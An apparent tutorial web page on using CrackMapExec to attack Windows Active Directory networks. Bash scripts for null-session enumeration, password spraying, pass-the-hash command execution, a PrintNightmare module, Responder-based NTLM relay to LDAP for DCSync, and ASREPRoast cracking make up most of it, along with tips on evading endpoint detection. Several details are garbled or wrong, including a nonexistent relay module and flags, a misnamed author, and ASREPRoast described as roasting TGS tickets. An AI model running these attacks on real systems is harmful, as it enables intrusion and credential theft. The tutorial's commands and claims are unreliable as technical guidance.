Skip to content
Learni
View all tutorials
Cybersécurité

How to Master CrackMapExec for Pentesting in 2026

14 minINTERMEDIATE
PentestingActive DirectoryCrackMapExecSMBNTLM Relay
Lire en français

Introduction

CrackMapExec (CME) is a swiss-army knife open-source framework for penetration testing on Windows and Active Directory networks, developed by Bydrax. In 2026, it's still essential for enumerating SMB hosts, relaying NTLM, spraying passwords, or running remote commands without alerting modern EDRs. Unlike heavy tools like Metasploit, CME shines in stealth and speed, making it ideal for Red Team operations.

Why use it? In a landscape where 80% of breaches involve stolen credentials (Verizon DBIR 2025 report), CME quickly validates weaknesses like weak NTLM hashes or ASREPRoastable users. This intermediate tutorial assumes basic Linux pentesting knowledge and guides you through advanced ethical uses on labs like HackTheBox or TryHackMe. Expect complete, tested commands on Kali 2026 for scanning a fictional 192.168.1.0/24 subnet.

Prerequisites

  • Kali Linux 2026 or equivalent pentest distro (VM recommended).
  • Python 3.12+ and pip installed.
  • Root/sudo access for installation.
  • Isolated test environment (e.g., AD lab with VirtualBox).
  • Intermediate knowledge of SMB, NTLM, and Bash.
  • Ethical warning: Use ONLY on your own labs or with written authorization.

Installing CrackMapExec

install-cme.sh
#!/bin/bash
sudo apt update && sudo apt install -y python3 python3-pip python3-venv git
python3 -m venv /opt/cme
source /opt/cme/bin/activate
git clone https://github.com/byt3bl33d3r/CrackMapExec.git /opt/cme/cme
pip install -r /opt/cme/cme/requirements.txt
pip install /opt/cme/cme
ln -s /opt/cme/bin/cme /usr/local/bin/cme
source /opt/cme/bin/activate
echo 'alias cme="source /opt/cme/bin/activate && cme"' >> ~/.bashrc
source ~/.bashrc
cme --version

This script installs CME in an isolated venv to avoid system Python conflicts. It clones the official repo, installs dependencies (like impacket), and sets up an easy-to-use alias. Test with cme --version, which should show 6.x in 2026; avoid global pip install cme as it often breaks crypto modules.

Verification and First Tests

After installation, validate with cme smb 127.0.0.1 on your local machine. CME lists supported SMB protocols (1-3) and signatures. Think of CME as a radar scanner: it pings port 445 via multicast for a quick network view, unlike slower SMB scans with nmap.

Basic SMB Enumeration of a Subnet

cme-smb-enum.sh
#!/bin/bash
TARGET="192.168.1.0/24"
cme smb $TARGET -u '' -p '' --shares --users --groups --rid-brute
cme smb $TARGET --shares --disks

These commands enumerate live hosts on 445, accessible shares (IPC$, ADMIN$), users/groups, and RID bruteforce (500=Administrator). Use empty creds for Null Sessions; --shares often reveals C$ for payload drops. Pitfall: Ignoring SMB signatures causes fails on Windows Server 2026.

Understanding Enumeration Output

Typical output shows Pwn3d! for valid creds, NT_STATUS_LOGON_FAILURE otherwise. Real example: On a vulnerable DC, Administrator:Password123 unlocks 20+ shares. Filter with --gen-relay-list relays.txt for later relaying. Analogy: Like a bouncer checking your ID without letting you in.

Password Spray on AD Domain

cme-spray.sh
#!/bin/bash
DOMAIN="lab.local"
USERS_FILE="users.txt"
PASSWORDS_FILE="passwords.txt"
TARGET="192.168.1.0/24"
cat > users.txt << EOF
administrator
user1
svc-backup
EOF
cat > passwords.txt << EOF
Password123
Summer2026!
Welcome1
EOF
cme smb $TARGET -d $DOMAIN -u users.txt -p passwords.txt --continue-on-success

Spraying avoids lockouts (1 attempt per user). --continue-on-success keeps going after hits. Create users/passwords.txt with common words (RockYou2026). On 50 users, find 2-3 valid ones in <1min; limit to 3-5 passwords per domain for stealth.

Pass-the-Hash with Captured Hashes

cme-pth.sh
#!/bin/bash
TARGET="192.168.1.10"
USERNAME="administrator"
HASH="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
cme smb $TARGET -u $USERNAME -H $HASH --local-auth --exec-method atexec -x "whoami /priv"
cme smb $TARGET -u $USERNAME -H $HASH -M printnightmare

Use NTLM hash (lm:nt) for auth without plaintext. --local-auth bypasses DC checks, atexec runs cmds via SMB. Test PrintNightmare for RCE; get hashes from Responder or secretsdump. Avoid --sam on EDR-heavy setups as it logs.

Advanced Attacks: Relay and Modules

For NTLM relay, pair with responder -I eth0 then cme smb $TARGET --gen-relay-list. Modules like kerberos/pkinit crack TGTs offline. Example: Relay to LDAP for DCSync to simulate Golden Ticket.

NTLM Relay to LDAP for DCSync

cme-relay.sh
#!/bin/bash
TARGET_RELAY="192.168.1.10"
TARGET_SPOOF="192.168.1.20"
responder -I eth0 -wrdp -v &
sleep 5
cme smb $TARGET_RELAY --gen-relay-list relays.txt
python3 /opt/cme/cme/modules/relay_smb.py relays.txt ldap://$TARGET_SPOOF -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' --dump-adcs

Generate relay list after Responder poisoning. Relay to LDAP to dump NTDS. --dump-adcs targets vulnerable cert templates (2026 MS25-XXX patches). Requires LLMNR/NBTNS enabled; stop Responder afterward for cleanup.

ASREPRoast for Pre-Auth Users

cme-asreproast.sh
#!/bin/bash
DOMAIN="lab.local"
TARGET="192.168.1.0/24"
cme ldap $TARGET -u '' -p '' --asreproast -o asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Enumerates users without Kerberos pre-auth, roasts TGS tickets. Crack offline with Hashcat. On labs, crack in seconds; filter DONT_REQ_PREAUTH via prior ldapsearch. Pitfall: Kerberos 2026 hardening blocks if AS-REP roasting is patched.

Best Practices

  • Always use venv: Isolates CME for impacket/cryptography compatibility.
  • Rate limiting: Add --jitter 5 --delay 2 for EDR evasion (e.g., Defender ATP).
  • Anonymous logs: Use --no-da (no domain append) and SOCKS proxies via --proxy socks5://127.0.0.1:1080.
  • Lab testing: Validate on AD 2019+ before prod; document ROP chains.
  • Ethics first: Get written RoE, report findings with MITRE ATT&CK mappings.

Common Errors to Avoid

  • Forgetting venv: Dependencies clash with Kali Python, causing No module 'impacket'. Fix: source /opt/cme/bin/activate.
  • Null session fails: On Win10+, force --always but lose stealth.
  • Wrong hash format: lm:nt without ':' crashes; validate with crackmapexec smb IP -u user -H hash.
  • No cleanup: Responder leaves poisons; pkill responder post-test.

Next Steps

Dive deeper with the official GitHub repo and impacket docs. Integrate with Cobalt Strike or Empire for C2. Explore our Learni cybersecurity trainings for Red Team certs like OSCP/OSCE. Resources: HackTricks CME page, PayloadsAllTheThings AD.

How to Master CrackMapExec Pentesting in 2026 | Learni